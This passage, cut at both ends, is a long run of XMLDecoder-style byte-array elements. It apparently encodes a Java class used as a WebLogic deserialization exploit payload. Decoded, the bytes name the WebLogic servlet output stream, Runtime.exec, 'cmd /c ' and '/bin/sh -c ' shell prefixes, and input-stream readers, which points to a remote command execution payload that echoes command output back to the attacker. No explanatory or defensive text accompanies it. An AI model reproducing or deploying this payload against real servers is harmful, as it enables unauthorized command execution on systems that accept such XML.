index=\"2287\"><byte>44</byte></void><void index=\"2288\"><byte>40</byte></void><void index=\"2289\"><byte>76</byte></void><void index=\"2290\"><byte>106</byte></void><void index=\"2291\"><byte>97</byte></void><void index=\"2292\"><byte>118</byte></void><void index=\"2293\"><byte>97</byte></void><void index=\"2294\"><byte>47</byte></void><void index=\"2295\"><byte>108</byte></void><void index=\"2296\"><byte>97</byte></void><void index=\"2297\"><byte>110</byte></void><void index=\"2298\"><byte>103</byte></void><void index=\"2299\"><byte>47</byte></void><void index=\"2300\"><byte>83</byte></void><void index=\"2301\"><byte>116</byte></void><void index=\"2302\"><byte>114</byte></void><void index=\"2303\"><byte>105</byte></void><void index=\"2304\"><byte>110</byte></void><void index=\"2305\"><byte>103</byte></void><void index=\"2306\"><byte>59</byte></void><void index=\"2307\"><byte>41</byte></void><void index=\"2308\"><byte>76</byte></void><void index=\"2309\"><byte>106</byte></void><void index=\"2310\"><byte>97</byte></void><void index=\"2311\"><byte>118</byte></void><void index=\"2312\"><byte>97</byte></void><void index=\"2313\"><byte>47</byte></void><void index=\"2314\"><byte>108</byte></void><void index=\"2315\"><byte>97</byte></void><void index=\"2316\"><byte>110</byte></void><void index=\"2317\"><byte>103</byte></void><void index=\"2318\"><byte>47</byte></void><void index=\"2319\"><byte>83</byte></void><void index=\"2320\"><byte>116</byte></void><void index=\"2321\"><byte>114</byte></void><void index=\"2322\"><byte>105</byte></void><void index=\"2323\"><byte>110</byte></void><void index=\"2324\"><byte>103</byte></void><void index=\"2325\"><byte>66</byte></void><void index=\"2326\"><byte>117</byte></void><void index=\"2327\"><byte>102</byte></void><void index=\"2328\"><byte>102</byte></void><void index=\"2329\"><byte>101</byte></void><void index=\"2330\"><byte>114</byte></void><void index=\"2331\"><byte>59</byte></void><void index=\"2332\"><byte>12</byte></void><void index=\"2333\"><byte>0</byte></void><void index=\"2334\"><byte>83</byte></void><void index=\"2335\"><byte>0</byte></void><void index=\"2336\"><byte>84</byte></void><void index=\"2337\"><byte>10</byte></void><void index=\"2338\"><byte>0</byte></void><void index=\"2339\"><byte>81</byte></void><void index=\"2340\"><byte>0</byte></void><void index=\"2341\"><byte>85</byte></void><void index=\"2342\"><byte>1</byte></void><void index=\"2343\"><byte>0</byte></void><void index=\"2344\"><byte>5</byte></void><void index=\"2345\"><byte>32</byte></void><void index=\"2346\"><byte>58</byte></void><void index=\"2347\"><byte>32</byte></void><void index=\"2348\"><byte>13</byte></void><void index=\"2349\"><byte>10</byte></void><void index=\"2350\"><byte>8</byte></void><void index=\"2351\"><byte>0</byte></void><void index=\"2352\"><byte>87</byte></void><void index=\"2353\"><byte>1</byte></void><void index=\"2354\"><byte>0</byte></void><void index=\"2355\"><byte>8</byte></void><void index=\"2356\"><byte>116</byte></void><void index=\"2357\"><byte>111</byte></void><void index=\"2358\"><byte>83</byte></void><void index=\"2359\"><byte>116</byte></void><void index=\"2360\"><byte>114</byte></void><void index=\"2361\"><byte>105</byte></void><void index=\"2362\"><byte>110</byte></void><void index=\"2363\"><byte>103</byte></void><void index=\"2364\"><byte>1</byte></void><void index=\"2365\"><byte>0</byte></void><void index=\"2366\"><byte>20</byte></void><void index=\"2367\"><byte>40</byte></void><void index=\"2368\"><byte>41</byte></void><void index=\"2369\"><byte>76</byte></void><void index=\"2370\"><byte>106</byte></void><void index=\"2371\"><byte>97</byte></void><void index=\"2372\"><byte>118</byte></void><void index=\"2373\"><byte>97</byte></void><void index=\"2374\"><byte>47</byte></void><void index=\"2375\"><byte>108</byte></void><void index=\"2376\"><byte>97</byte></void><void index=\"2377\"><byte>110</byte></void><void index=\"2378\"><byte>103</byte></void><void index=\"2379\"><byte>47</byte></void><void index=\"2380\"><byte>83</byte></void><void index=\"2381\"><byte>116</byte></void><void index=\"2382\"><byte>114</byte></void><void index=\"2383\"><byte>105</byte></void><void index=\"2384\"><byte>110</byte></void><void index=\"2385\"><byte>103</byte></void><void index=\"2386\"><byte>59</byte></void><void index=\"2387\"><byte>12</byte></void><void index=\"2388\"><byte>0</byte></void><void index=\"2389\"><byte>89</byte></void><void index=\"2390\"><byte>0</byte></void><void index=\"2391\"><byte>90</byte></void><void index=\"2392\"><byte>10</byte></void><void index=\"2393\"><byte>0</byte></void><void index=\"2394\"><byte>81</byte></void><void index=\"2395\"><byte>0</byte></void><void index=\"2396\"><byte>91</byte></void><void index=\"2397\"><byte>12</byte></void><void index=\"2398\"><byte>0</byte></void><void index=\"2399\"><byte>10</byte></void><void index=\"2400\"><byte>0</byte></void><void index=\"2401\"><byte>71</byte></void><void index=\"2402\"><byte>10</byte></void><void index=\"2403\"><byte>0</byte></void><void index=\"2404\"><byte>79</byte></void><void index=\"2405\"><byte>0</byte></void><void index=\"2406\"><byte>93</byte></void><void index=\"2407\"><byte>1</byte></void><void index=\"2408\"><byte>0</byte></void><void index=\"2409\"><byte>49</byte></void><void index=\"2410\"><byte>119</byte></void><void index=\"2411\"><byte>101</byte></void><void index=\"2412\"><byte>98</byte></void><void index=\"2413\"><byte>108</byte></void><void index=\"2414\"><byte>111</byte></void><void index=\"2415\"><byte>103</byte></void><void index=\"2416\"><byte>105</byte></void><void index=\"2417\"><byte>99</byte></void><void index=\"2418\"><byte>47</byte></void><void index=\"2419\"><byte>115</byte></void><void index=\"2420\"><byte>101</byte></void><void index=\"2421\"><byte>114</byte></void><void index=\"2422\"><byte>118</byte></void><void index=\"2423\"><byte>108</byte></void><void index=\"2424\"><byte>101</byte></void><void index=\"2425\"><byte>116</byte></void><void index=\"2426\"><byte>47</byte></void><void index=\"2427\"><byte>105</byte></void><void index=\"2428\"><byte>110</byte></void><void index=\"2429\"><byte>116</byte></void><void index=\"2430\"><byte>101</byte></void><void index=\"2431\"><byte>114</byte></void><void index=\"2432\"><byte>110</byte></void><void index=\"2433\"><byte>97</byte></void><void index=\"2434\"><byte>108</byte></void><void index=\"2435\"><byte>47</byte></void><void index=\"2436\"><byte>83</byte></void><void index=\"2437\"><byte>101</byte></void><void index=\"2438\"><byte>114</byte></void><void index=\"2439\"><byte>118</byte></void><void index=\"2440\"><byte>108</byte></void><void index=\"2441\"><byte>101</byte></void><void index=\"2442\"><byte>116</byte></void><void index=\"2443\"><byte>79</byte></void><void index=\"2444\"><byte>117</byte></void><void index=\"2445\"><byte>116</byte></void><void index=\"2446\"><byte>112</byte></void><void index=\"2447\"><byte>117</byte></void><void index=\"2448\"><byte>116</byte></void><void index=\"2449\"><byte>83</byte></void><void index=\"2450\"><byte>116</byte></void><void index=\"2451\"><byte>114</byte></void><void index=\"2452\"><byte>101</byte></void><void index=\"2453\"><byte>97</byte></void><void index=\"2454\"><byte>109</byte></void><void index=\"2455\"><byte>73</byte></void><void index=\"2456\"><byte>109</byte></void><void index=\"2457\"><byte>112</byte></void><void index=\"2458\"><byte>108</byte></void><void index=\"2459\"><byte>7</byte></void><void index=\"2460\"><byte>0</byte></void><void index=\"2461\"><byte>95</byte></void><void index=\"2462\"><byte>1</byte></void><void index=\"2463\"><byte>0</byte></void><void index=\"2464\"><byte>11</byte></void><void index=\"2465\"><byte>119</byte></void><void index=\"2466\"><byte>114</byte></void><void index=\"2467\"><byte>105</byte></void><void index=\"2468\"><byte>116</byte></void><void index=\"2469\"><byte>101</byte></void><void index=\"2470\"><byte>83</byte></void><void index=\"2471\"><byte>116</byte></void><void index=\"2472\"><byte>114</byte></void><void index=\"2473\"><byte>101</byte></void><void index=\"2474\"><byte>97</byte></void><void index=\"2475\"><byte>109</byte></void><void index=\"2476\"><byte>1</byte></void><void index=\"2477\"><byte>0</byte></void><void index=\"2478\"><byte>24</byte></void><void index=\"2479\"><byte>40</byte></void><void index=\"2480\"><byte>76</byte></void><void index=\"2481\"><byte>106</byte></void><void index=\"2482\"><byte>97</byte></void><void index=\"2483\"><byte>118</byte></void><void index=\"2484\"><byte>97</byte></void><void index=\"2485\"><byte>47</byte></void><void index=\"2486\"><byte>105</byte></void><void index=\"2487\"><byte>111</byte></void><void index=\"2488\"><byte>47</byte></void><void index=\"2489\"><byte>73</byte></void><void index=\"2490\"><byte>110</byte></void><void index=\"2491\"><byte>112</byte></void><void index=\"2492\"><byte>117</byte></void><void index=\"2493\"><byte>116</byte></void><void index=\"2494\"><byte>83</byte></void><void index=\"2495\"><byte>116</byte></void><void index=\"2496\"><byte>114</byte></void><void index=\"2497\"><byte>101</byte></void><void index=\"2498\"><byte>97</byte></void><void index=\"2499\"><byte>109</byte></void><void index=\"2500\"><byte>59</byte></void><void index=\"2501\"><byte>41</byte></void><void index=\"2502\"><byte>86</byte></void><void index=\"2503\"><byte>12</byte></void><void index=\"2504\"><byte>0</byte></void><void index=\"2505\"><byte>97</byte></void><void index=\"2506\"><byte>0</byte></void><void index=\"2507\"><byte>98</byte></void><void index=\"2508\"><byte>10</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>96</byte></void><void index=\"2511\"><byte>0</byte></void><void index=\"2512\"><byte>99</byte></void><void index=\"2513\"><byte>1</byte></void><void index=\"2514\"><byte>0</byte></void><void index=\"2515\"><byte>5</byte></void><void index=\"2516\"><byte>102</byte></void><void index=\"2517\"><byte>108</byte></void><void index=\"2518\"><byte>117</byte></void><void index=\"2519\"><byte>115</byte></void><void index=\"2520\"><byte>104</byte></void><void index=\"2521\"><byte>12</byte></void><void index=\"2522\"><byte>0</byte></void><void index=\"2523\"><byte>101</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>11</byte></void><void index=\"2526\"><byte>10</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>96</byte></void><void index=\"2529\"><byte>0</byte></void><void index=\"2530\"><byte>102</byte></void><void index=\"2531\"><byte>1</byte></void><void index=\"2532\"><byte>0</byte></void><void index=\"2533\"><byte>7</byte></void><void index=\"2534\"><byte>111</byte></void><void index=\"2535\"><byte>115</byte></void><void index=\"2536\"><byte>46</byte></void><void index=\"2537\"><byte>110</byte></void><void index=\"2538\"><byte>97</byte></void><void index=\"2539\"><byte>109</byte></void><void index=\"2540\"><byte>101</byte></void><void index=\"2541\"><byte>8</byte></void><void index=\"2542\"><byte>0</byte></void><void index=\"2543\"><byte>104</byte></void><void index=\"2544\"><byte>1</byte></void><void index=\"2545\"><byte>0</byte></void><void index=\"2546\"><byte>16</byte></void><void index=\"2547\"><byte>106</byte></void><void index=\"2548\"><byte>97</byte></void><void index=\"2549\"><byte>118</byte></void><void index=\"2550\"><byte>97</byte></void><void index=\"2551\"><byte>47</byte></void><void index=\"2552\"><byte>108</byte></void><void index=\"2553\"><byte>97</byte></void><void index=\"2554\"><byte>110</byte></void><void index=\"2555\"><byte>103</byte></void><void index=\"2556\"><byte>47</byte></void><void index=\"2557\"><byte>83</byte></void><void index=\"2558\"><byte>121</byte></void><void index=\"2559\"><byte>115</byte></void><void index=\"2560\"><byte>116</byte></void><void index=\"2561\"><byte>101</byte></void><void index=\"2562\"><byte>109</byte></void><void index=\"2563\"><byte>7</byte></void><void index=\"2564\"><byte>0</byte></void><void index=\"2565\"><byte>106</byte></void><void index=\"2566\"><byte>1</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>11</byte></void><void index=\"2569\"><byte>103</byte></void><void index=\"2570\"><byte>101</byte></void><void index=\"2571\"><byte>116</byte></void><void index=\"2572\"><byte>80</byte></void><void index=\"2573\"><byte>114</byte></void><void index=\"2574\"><byte>111</byte></void><void index=\"2575\"><byte>112</byte></void><void index=\"2576\"><byte>101</byte></void><void index=\"2577\"><byte>114</byte></void><void index=\"2578\"><byte>116</byte></void><void index=\"2579\"><byte>121</byte></void><void index=\"2580\"><byte>12</byte></void><void index=\"2581\"><byte>0</byte></void><void index=\"2582\"><byte>108</byte></void><void index=\"2583\"><byte>0</byte></void><void index=\"2584\"><byte>59</byte></void><void index=\"2585\"><byte>10</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>107</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>109</byte></void><void index=\"2590\"><byte>1</byte></void><void index=\"2591\"><byte>0</byte></void><void index=\"2592\"><byte>16</byte></void><void index=\"2593\"><byte>106</byte></void><void index=\"2594\"><byte>97</byte></void><void index=\"2595\"><byte>118</byte></void><void index=\"2596\"><byte>97</byte></void><void index=\"2597\"><byte>47</byte></void><void index=\"2598\"><byte>108</byte></void><void index=\"2599\"><byte>97</byte></void><void index=\"2600\"><byte>110</byte></void><void index=\"2601\"><byte>103</byte></void><void index=\"2602\"><byte>47</byte></void><void index=\"2603\"><byte>83</byte></void><void index=\"2604\"><byte>116</byte></void><void index=\"2605\"><byte>114</byte></void><void index=\"2606\"><byte>105</byte></void><void index=\"2607\"><byte>110</byte></void><void index=\"2608\"><byte>103</byte></void><void index=\"2609\"><byte>7</byte></void><void index=\"2610\"><byte>0</byte></void><void index=\"2611\"><byte>111</byte></void><void index=\"2612\"><byte>1</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>11</byte></void><void index=\"2615\"><byte>116</byte></void><void index=\"2616\"><byte>111</byte></void><void index=\"2617\"><byte>76</byte></void><void index=\"2618\"><byte>111</byte></void><void index=\"2619\"><byte>119</byte></void><void index=\"2620\"><byte>101</byte></void><void index=\"2621\"><byte>114</byte></void><void index=\"2622\"><byte>67</byte></void><void index=\"2623\"><byte>97</byte></void><void index=\"2624\"><byte>115</byte></void><void index=\"2625\"><byte>101</byte></void><void index=\"2626\"><byte>12</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>113</byte></void><void index=\"2629\"><byte>0</byte></void><void index=\"2630\"><byte>90</byte></void><void index=\"2631\"><byte>10</byte></void><void index=\"2632\"><byte>0</byte></void><void index=\"2633\"><byte>112</byte></void><void index=\"2634\"><byte>0</byte></void><void index=\"2635\"><byte>114</byte></void><void index=\"2636\"><byte>1</byte></void><void index=\"2637\"><byte>0</byte></void><void index=\"2638\"><byte>3</byte></void><void index=\"2639\"><byte>119</byte></void><void index=\"2640\"><byte>105</byte></void><void index=\"2641\"><byte>110</byte></void><void index=\"2642\"><byte>8</byte></void><void index=\"2643\"><byte>0</byte></void><void index=\"2644\"><byte>116</byte></void><void index=\"2645\"><byte>1</byte></void><void index=\"2646\"><byte>0</byte></void><void index=\"2647\"><byte>8</byte></void><void index=\"2648\"><byte>99</byte></void><void index=\"2649\"><byte>111</byte></void><void index=\"2650\"><byte>110</byte></void><void index=\"2651\"><byte>116</byte></void><void index=\"2652\"><byte>97</byte></void><void index=\"2653\"><byte>105</byte></void><void index=\"2654\"><byte>110</byte></void><void index=\"2655\"><byte>115</byte></void><void index=\"2656\"><byte>1</byte></void><void index=\"2657\"><byte>0</byte></void><void index=\"2658\"><byte>27</byte></void><void index=\"2659\"><byte>40</byte></void><void index=\"2660\"><byte>76</byte></void><void index=\"2661\"><byte>106</byte></void><void index=\"2662\"><byte>97</byte></void><void index=\"2663\"><byte>118</byte></void><void index=\"2664\"><byte>97</byte></void><void index=\"2665\"><byte>47</byte></void><void index=\"2666\"><byte>108</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>110</byte></void><void index=\"2669\"><byte>103</byte></void><void index=\"2670\"><byte>47</byte></void><void index=\"2671\"><byte>67</byte></void><void index=\"2672\"><byte>104</byte></void><void index=\"2673\"><byte>97</byte></void><void index=\"2674\"><byte>114</byte></void><void index=\"2675\"><byte>83</byte></void><void index=\"2676\"><byte>101</byte></void><void index=\"2677\"><byte>113</byte></void><void index=\"2678\"><byte>117</byte></void><void index=\"2679\"><byte>101</byte></void><void index=\"2680\"><byte>110</byte></void><void index=\"2681\"><byte>99</byte></void><void index=\"2682\"><byte>101</byte></void><void index=\"2683\"><byte>59</byte></void><void index=\"2684\"><byte>41</byte></void><void index=\"2685\"><byte>90</byte></void><void index=\"2686\"><byte>12</byte></void><void index=\"2687\"><byte>0</byte></void><void index=\"2688\"><byte>118</byte></void><void index=\"2689\"><byte>0</byte></void><void index=\"2690\"><byte>119</byte></void><void index=\"2691\"><byte>10</byte></void><void index=\"2692\"><byte>0</byte></void><void index=\"2693\"><byte>112</byte></void><void index=\"2694\"><byte>0</byte></void><void index=\"2695\"><byte>120</byte></void><void index=\"2696\"><byte>1</byte></void><void index=\"2697\"><byte>0</byte></void><void index=\"2698\"><byte>17</byte></void><void index=\"2699\"><byte>106</byte></void><void index=\"2700\"><byte>97</byte></void><void index=\"2701\"><byte>118</byte></void><void index=\"2702\"><byte>97</byte></void><void index=\"2703\"><byte>47</byte></void><void index=\"2704\"><byte>108</byte></void><void index=\"2705\"><byte>97</byte></void><void index=\"2706\"><byte>110</byte></void><void index=\"2707\"><byte>103</byte></void><void index=\"2708\"><byte>47</byte></void><void index=\"2709\"><byte>82</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>110</byte></void><void index=\"2712\"><byte>116</byte></void><void index=\"2713\"><byte>105</byte></void><void index=\"2714\"><byte>109</byte></void><void index=\"2715\"><byte>101</byte></void><void index=\"2716\"><byte>7</byte></void><void index=\"2717\"><byte>0</byte></void><void index=\"2718\"><byte>122</byte></void><void index=\"2719\"><byte>1</byte></void><void index=\"2720\"><byte>0</byte></void><void index=\"2721\"><byte>10</byte></void><void index=\"2722\"><byte>103</byte></void><void index=\"2723\"><byte>101</byte></void><void index=\"2724\"><byte>116</byte></void><void index=\"2725\"><byte>82</byte></void><void index=\"2726\"><byte>117</byte></void><void index=\"2727\"><byte>110</byte></void><void index=\"2728\"><byte>116</byte></void><void index=\"2729\"><byte>105</byte></void><void index=\"2730\"><byte>109</byte></void><void index=\"2731\"><byte>101</byte></void><void index=\"2732\"><byte>1</byte></void><void index=\"2733\"><byte>0</byte></void><void index=\"2734\"><byte>21</byte></void><void index=\"2735\"><byte>40</byte></void><void index=\"2736\"><byte>41</byte></void><void index=\"2737\"><byte>76</byte></void><void index=\"2738\"><byte>106</byte></void><void index=\"2739\"><byte>97</byte></void><void index=\"2740\"><byte>118</byte></void><void index=\"2741\"><byte>97</byte></void><void index=\"2742\"><byte>47</byte></void><void index=\"2743\"><byte>108</byte></void><void index=\"2744\"><byte>97</byte></void><void index=\"2745\"><byte>110</byte></void><void index=\"2746\"><byte>103</byte></void><void index=\"2747\"><byte>47</byte></void><void index=\"2748\"><byte>82</byte></void><void index=\"2749\"><byte>117</byte></void><void index=\"2750\"><byte>110</byte></void><void index=\"2751\"><byte>116</byte></void><void index=\"2752\"><byte>105</byte></void><void index=\"2753\"><byte>109</byte></void><void index=\"2754\"><byte>101</byte></void><void index=\"2755\"><byte>59</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>0</byte></void><void index=\"2758\"><byte>124</byte></void><void index=\"2759\"><byte>0</byte></void><void index=\"2760\"><byte>125</byte></void><void index=\"2761\"><byte>10</byte></void><void index=\"2762\"><byte>0</byte></void><void index=\"2763\"><byte>123</byte></void><void index=\"2764\"><byte>0</byte></void><void index=\"2765\"><byte>126</byte></void><void index=\"2766\"><byte>1</byte></void><void index=\"2767\"><byte>0</byte></void><void index=\"2768\"><byte>7</byte></void><void index=\"2769\"><byte>99</byte></void><void index=\"2770\"><byte>109</byte></void><void index=\"2771\"><byte>100</byte></void><void index=\"2772\"><byte>32</byte></void><void index=\"2773\"><byte>47</byte></void><void index=\"2774\"><byte>99</byte></void><void index=\"2775\"><byte>32</byte></void><void index=\"2776\"><byte>8</byte></void><void index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>102</byte></void><void index=\"2869\"><byte>102</byte></void><void index=\"2870\"><byte>101</byte></void><void index=\"2871\"><byte>114</byte></void><void index=\"2872\"><byte>101</byte></void><void index=\"2873\"><byte>100</byte></void><void index=\"2874\"><byte>82</byte></void><void index=\"2875\"><byte>101</byte></void><void index=\"2876\"><byte>97</byte></void><void index=\"2877\"><byte>100</byte></void><void index=\"2878\"><byte>101</byte></void><void index=\"2879\"><byte>114</byte></void><void index=\"2880\"><byte>7</byte></void><void index=\"2881\"><byte>0</byte></void><void index=\"2882\"><byte>-120</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>25</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>105</byte></void><void index=\"2892\"><byte>111</byte></void><void index=\"2893\"><byte>47</byte></void><void index=\"2894\"><byte>73</byte></void><void index=\"2895\"><byte>110</byte></void><void index=\"2896\"><byte>112</byte></void><void index=\"2897\"><byte>117</byte></void><void index=\"2898\"><byte>116</byte></void><void index=\"2899\"><byte>83</byte></void><void index=\"2900\"><byte>116</byte></void><void index=\"2901\"><byte>114</byte></void><void index=\"2902\"><byte>101</byte></void><void index=\"2903\"><byte>97</byte></void><void index=\"2904\"><byte>109</byte></void><void index=\"2905\"><byte>82</byte></void><void index=\"2906\"><byte>101</byte></void><void index=\"2907\"><byte>97</byte></void><void index=\"2908\"><byte>100</byte></void><void index=\"2909\"><byte>101</byte></void><void index=\"2910\"><byte>114</byte></void><void index=\"2911\"><byte>7</byte></void><void index=\"2912\"><byte>0</byte></void><void index=\"2913\"><byte>-118</byte></void><void index=\"2914\"><byte>1</byte></void><void index=\"2915\"><byte>0</byte></void><void index=\"2916\"><byte>17</byte></void><void index=\"2917\"><byte>106</byte></void><void index=\"2918\"><byte>97</byte></void><void index=\"2919\"><byte>118</byte></void><void index=\"2920\"><byte>97</byte></void><void index=\"2921\"><byte>47</byte></void><void index=\"2922\"><byte>108</byte></void><void index=\"2923\"><byte>97</byte></void><void index=\"2924\"><byte>110</byte></void><void index=\"2925\"><byte>103</byte></void><void index=\"2926\"><byte>47</byte></void><void index=\"2927\"><byte>80</byte></void><void index=\"2928\"><byte>114</byte></void><void index=\"2929\"><byte>111</byte></void><void index=\"2930\"><byte>99</byte></void><void index=\"2931\"><byte>101</byte></void><void index=\"2932\"><byte>115</byte></void><void index=\"2933\"><byte>115</byte></void><void index=\"2934\"><byte>7</byte></void><void index=\"2935\"><byte>0</byte></void><void index=\"2936\"><byte>-116</byte></void><void index=\"2937\"><byte>1</byte></void><void index=\"2938\"><byte>0</byte></void><void index=\"2939\"><byte>14</byte></void><void index=\"2940\"><byte>103</byte></void><void index=\"2941\"><byte>101</byte></void><void index=\"2942\"><byte>116</byte></void><void index=\"2943\"><byte>73</byte></void><void index=\"2944\"><byte>110</byte></void><void index=\"2945\"><byte>112</byte></void><void index=\"2946\"><byte>117</byte></void><void index=\"2947\"><byte>116</byte></void><void index=\"2948\"><byte>83</byte></void><void index=\"2949\"><byte>116</byte></void><void index=\"2950\"><byte>114</byte></void><void index=\"2951\"><byte>101</byte></void><void index=\"2952\"><byte>97</byte></void><void index=\"2953\"><byte>109</byte></void><void index=\"2954\"><byte>1</byte></void><void index=\"2955\"><byte>0</byte></void><void index=\"2956\"><byte>23</byte></void><void index=\"2957\"><byte>40</byte></void><void index=\"2958\"><byte>41</byte></void><void index=\"2959\"><byte>76</byte></void><void index=\"2960\"><byte>106</byte></void><void index=\"2961\"><byte>97</byte></void><void index=\"2962\"><byte>118</byte></void><void index=\"2963\"><byte>97</byte></void><void index=\"2964\"><byte>47</byte></void><void index=\"2965\"><byte>105</byte></void><void index=\"2966\"><byte>111</byte></void><void index=\"2967\"><byte>47</byte></void><void index=\"2968\"><byte>73</byte></void><void index=\"2969\"><byte>110</byte></void><void index=\"2970\"><byte>112</byte></void><void index=\"2971\"><byte>117</byte></void><void index=\"2972\"><byte>116</byte></void><void index=\"2973\"><byte>83</byte></void><void index=\"2974\"><byte>116</byte></void><void index=\"2975\"><byte>114</byte></void><void index=\"2976\"><byte>101</byte></void><void index=\"2977\"><byte>97</byte></void><void index=\"2978\"><byte>109</byte></void><void index=\"2979\"><byte>59</byte></void><void index=\"2980\"><byte>12</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>-114</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>-113</byte></void><void index=\"2985\"><byte>10</byte></void><void index=\"2986\"><byte>0</byte></void><void index=\"2987\"><byte>-115</byte></void><void index=\"2988\"><byte>0</byte></void><void index=\"2989\"><byte>-112</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>42</byte></void><void index=\"2993\"><byte>40</byte></void><void index=\"2994\"><byte>76</byte></void><void index=\"2995\"><byte>106</byte></void><void index=\"2996\"><byte>97</byte></void><void index=\"2997\"><byte>118</byte></void><void index=\"2998\"><byte>97</byte></void><void index=\"2999\"><byte>47</byte></void><void index=\"3000\"><byte>105</byte></void><void index=\"3001\"><byte>111</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>73</byte></void><void index=\"3004\"><byte>110</byte></void><void index=\"3005\"><byte>112</byte></void><void index=\"3006\"><byte>117</byte></void><void index=\"3007\"><byte>116</byte></void><void index=\"3008\"><byte>83</byte></void><void index=\"3009\"><byte>116</byte></void><void index=\"3010\"><byte>114</byte></void><void index=\"3011\"><byte>101</byte></void><void index=\"3012\"><byte>97</byte></void><void index=\"3013\"><byte>109</byte></void><void index=\"3014\"><byte>59</byte></void><void index=\"3015\"><byte>76</byte></void><void index=\"3016\"><byte>106</byte></void><void index=\"3017\"><byte>97</byte></void><void index=\"3018\"><byte>118</byte></void><void index=\"3019\"><byte>97</byte></void><void index=\"3020\"><byte>47</byte></void><void index=\"3021\"><byte>108</byte></void><void index=\"3022\"><byte>97</byte></void><void index=\"3023\"><byte>110</byte></void><void index=\"3024\"><byte>103</byte></void><void index=\"3025\"><byte>47</byte></void><void index=\"3026\"><byte>83</byte></void><void index=\"3027\"><byte>116</byte></void><void index=\"3028\"><byte>114</byte></void><void index=\"3029\"><byte>105</byte></void><void index=\"3030\"><byte>110</byte></void><void index=\"3031\"><byte>103</byte></void><void index=\"3032\"><byte>59</byte></void><void index=\"3033\"><byte>41</byte></void><void index=\"3034\"><byte>86</byte></void><void index=\"3035\"><byte>12</byte></void><void 